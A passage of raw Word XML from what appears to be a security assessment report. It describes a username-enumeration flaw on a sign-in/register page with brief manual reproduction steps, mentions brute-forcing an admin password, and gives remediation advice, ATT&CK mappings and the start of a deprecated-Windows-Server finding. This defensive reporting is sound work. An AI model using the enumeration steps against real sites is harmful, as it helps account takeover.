            <w:r w:rsidRPr="0D325B6E" w:rsidR="0A41414C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Medium</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662E2A46"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BE4644D"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="5F111FAD">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B15AD36" w14:textId="5905B77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2857870" w14:textId="0758BD2C">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63C9064B">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BCBF0B4" w14:textId="04360AD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EA6C079" w14:textId="7666167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B4A2377" w:rsidP="0D325B6E" w:rsidRDefault="3B4A2377" w14:paraId="65E324C9" w14:textId="12F44F79">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R3ae89989d34b4e61">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="3B4A2377">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>T1087</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="3049CD63">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="3B4A2377">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t xml:space="preserve"> Account Discovery</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4132D8B2">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9052233"/>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B71EA2" w14:textId="500436EE">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2266A79" w:rsidP="0D325B6E" w:rsidRDefault="32266A79" w14:paraId="31A2FEC1" w14:textId="3E3FDC6F">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R338383d7115b4cc9">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="32266A79">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1054: Software Configuration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="38D23EB0">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1FAF911" w14:textId="438A578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1DD47F29" w14:textId="454D80FC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4678E152" w14:textId="60F7EA26">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>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2F8052EE" w:rsidP="0D325B6E" w:rsidRDefault="2F8052EE" w14:paraId="45057AFC" w14:textId="0C32EAC2">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8052EE">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513411FC" w:rsidP="0D325B6E" w:rsidRDefault="513411FC" w14:paraId="10E4BDC6" w14:textId="5D3D7F7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13411FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Upon credentials being entered, t</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="49CD0569">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="49CD0569">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sign-in/register</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="49CD0569">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page issues a different response based on </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whether or not</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 an account with the provided name already exists.</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This </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="00A64644">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allows an</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 attacker to </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determine</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2E9484C5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7857FEAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a user exists, making it </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6D73ED1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">possible to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6D73ED1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>enumerate</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6D73ED1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> users</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="38ADF40F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the system</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6D73ED1E">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72C13208" w14:textId="25D5A8B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8052EE" w:rsidP="0D325B6E" w:rsidRDefault="2F8052EE" w14:paraId="0D754953" w14:textId="05D1E49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8052EE">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70CDAA9A" w:rsidP="0D325B6E" w:rsidRDefault="70CDAA9A" w14:paraId="0B84577E" w14:textId="589CBFBA">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This is not a significant issue in and of </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="27DB5948">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>itself but</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exploiting this functionality</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62C9C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to</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numerat</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users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l</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ikely wit</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h</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a word list) is useful in chain attack</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6DC39BA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. F</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or example, an attacker could</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d</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etermin</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e</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the exact name of an admin </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6A7BA5BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>account and</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="70CDAA9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> then try to brute-force the password of that account</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0C643487">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54A3E85F" w14:textId="7C039AEA">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8052EE" w:rsidP="0D325B6E" w:rsidRDefault="2F8052EE" w14:paraId="1B40E5C4" w14:textId="4838A6E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8052EE">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144D1C0" w:rsidP="0D325B6E" w:rsidRDefault="6144D1C0" w14:paraId="13C4448F" w14:textId="39A58FF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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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0D325B6E" w:rsidR="6144D1C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PAGE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6144D1C0" w:rsidP="0D325B6E" w:rsidRDefault="6144D1C0" w14:paraId="5180D9AE" w14:textId="70BFD064">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Step 2: Enter a random username with any arbitrary password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6144D1C0" w:rsidP="0D325B6E" w:rsidRDefault="6144D1C0" w14:paraId="3DA243C4" w14:textId="6FEDD9B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Step 3: Enter an existing username with any arbitrary password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6144D1C0" w:rsidP="0D325B6E" w:rsidRDefault="6144D1C0" w14:paraId="4DC1F2FF" w14:textId="1D06196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 xml:space="preserve">Step 4: </w:t>
      </w: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6144D1C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the response being different</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6A4698C8" w14:textId="3BACDFB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8052EE" w:rsidP="0D325B6E" w:rsidRDefault="2F8052EE" w14:paraId="29876A33" w14:textId="2059C03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8052EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1E8FA40F" w:rsidP="0D325B6E" w:rsidRDefault="1E8FA40F" w14:paraId="4BB74E09" w14:textId="694FA536">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E8FA40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1E8FA40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12C0A177" w:rsidP="0D325B6E" w:rsidRDefault="12C0A177" w14:paraId="3EA1CAB0" w14:textId="4D20D7F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>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Issue the same error of invalid name or password </w:t>
      </w:r>
      <w:bookmarkStart w:name="_Int_gQRwIkJG" w:id="1762360800"/>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regardless</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1762360800"/>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 of if a valid username was inputted into the login request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="12C0A177" w:rsidP="0D325B6E" w:rsidRDefault="12C0A177" w14:paraId="0AC8BA96" w14:textId="6E9F30F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>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rate </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limited</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 login requests to prevent a malicious actor from </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attempting</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 a large amount of login requests in </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a short time</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="12C0A177">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> frame, to avoid user enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="38E6562F" w14:textId="68E032E4">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2F8052EE" w:rsidP="0D325B6E" w:rsidRDefault="2F8052EE" w14:paraId="1C11FF83" w14:textId="1ACB7F93">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F8052EE">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B422AC1" w:rsidP="0D325B6E" w:rsidRDefault="4B422AC1" w14:paraId="19FE6E0A" w14:textId="24871599">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R2a091c2e50184367">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="4B422AC1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OWASP - Account Enumeration</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1B0D456B" w14:textId="513DCC7B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>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0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="757356A6" w14:textId="5F981ED2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="53C1DFE5" w:rsidP="0D325B6E" w:rsidRDefault="53C1DFE5" w14:paraId="00743917" w14:textId="4CA732B4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="53C1DFE5">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80" w:themeShade="FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="53C1DFE5">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I1: Deprecated Windows Server Version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7D806E88">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7B4B805" w14:textId="7871627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5D56227" w14:textId="1FFBC55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AAB205B" w14:textId="677D672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83EBAFC">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5DE9639" w14:textId="2B5AB96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3E983581" w14:textId="7EA8683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45F1E7D1" w14:textId="549B744C">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CDEE24A" w14:textId="7DEE179C">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00ACC7F4">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99406BC" w14:textId="4954B0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6F9BCFF6" w14:textId="7A164BBD">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59C9AEE2"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67B7AD1B"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="041A4EF6">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9F63343" w14:textId="5905B77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12AAA0E" w14:textId="0758BD2C">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4755245E">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320522A" w14:textId="04360AD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1AAA4B2" w14:textId="7666167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1AA4F8E" w:rsidP="0D325B6E" w:rsidRDefault="41AA4F8E" w14:paraId="7B5375B7" w14:textId="7D13CBAB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rc8e65380e7cf44e8">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="41AA4F8E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>T1595: Active Scanning</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="5D4F823A">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1F5C006F"/>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DC652E" w14:textId="500436EE">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6CEE45F9" w:rsidP="0D325B6E" w:rsidRDefault="6CEE45F9" w14:paraId="63CCD095" w14:textId="34AA034D">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Ra5433668dea04ee9">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6CEE45F9">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>M1051: Update Software</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="40DBBB2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DEC0F4F" w14:textId="438A578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E156AB0" w14:textId="454D80FC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="750BCBB3" w14:textId="54A40620">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
